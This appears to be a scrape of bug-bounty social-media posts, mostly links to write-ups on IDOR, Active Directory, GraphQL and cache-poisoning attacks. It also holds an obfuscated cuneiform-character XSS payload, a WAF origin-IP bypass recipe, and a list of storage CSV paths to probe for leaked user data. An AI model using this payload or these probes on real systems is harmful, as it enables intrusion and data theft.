an XSS payload, Cuneiform-alphabet based 𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] +𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")() #bugbounty #bugbountytips #cybersecurity

After going through 200+ IDOR reports, and spending some time hunting for them in Real Targets across multiple functionalities, here are some of the attack methodologies I build for myself, which I feel can be useful to others too. Follow this thread to know more.

Been studying Active Directory attacks lately and wrote some notes. Hope it helps someone out there ahmed-tarek.gitbook.io/0x_xnum/ad-pen #BugBounty #BugBountytip #bugcrowd #hackerone #pentesting

GraphQL Penetration Testing Guide & Common Attacks deepstrike.io/blog/graphql-a… #penetration_testing #BugBounty

#bugbounty #bugbountytips #CyberSecurity boom-stinger-c76.notion.site/AWS-Cognito-Ch…

Building A CPU From Scratch

4 Ways to bypass checkout systems in e-commerce targets! 🤑 A thread! 🧵 👇

Wanna find the origin IP? 1-Hunt for a subdomain with no WAF 2-extract the ASN 2-check it on bgp.he.net 3- grab the IP range, and verify a live IP. Welcome to their world! #bugbountytips #BugBounty

Wanna find the origin IP? 1-Hunt for a subdomain with no WAF 2-extract the ASN 2-check it on bgp.he.net 3- grab the IP range, and verify a live IP. Welcome to their world! #bugbountytips #BugBounty

just scored my biggest bounty to date, a nice $50,000 on Immunefi; huge shoutout to the mediation team; without them, the report would currently be in the vast graveyard of valid reports; they respect their researchers. and above all: هَٰذَا مِن فَضْلِ رَبِّي

Cache Poisoning Leads to Stored XSS: Manipulation of Response via Accept Header $1,250 by:A L I blog.koalasec.co/cache-poisonin…

Another month, another writing RCE vulnerability inside Opera browser by using a stored self-XSS on MyFlow (this is different from the previous rce which I published back in 2021) medium.com/@renwa/stored-…

Where are ‘All eyes on Rafah’ now, huh? Or was it just a trend? Or has wiping us out become the damn norm!

Somewhere in Japan 🔥

شرحت لكم الـActive Directory من روم Active Directory Basics على TryHackMe اثناء محاولتي لتعلمه اذا تبغون نكمل ونسوي Part2 علموني مشاهدة ممتعة

The endpoint was : /storage/users.csv Also try more endpoints like /storage/orders.csv /storage/transactions.csv /storage/reports.csv /storage/customers.csv /storage/backups/users_backup.csv /storage/tables/profiles.csv /storage/tables/roles.csv /storage/tables/invoices.csv

ثريد 🕷️ مراجعة شهادة CBBH 🕷️ 🕷️ HTB CBBH Review 🕷️

lol ahahaha. you might think of something better than this hahaha #xss #bugbounty #infosec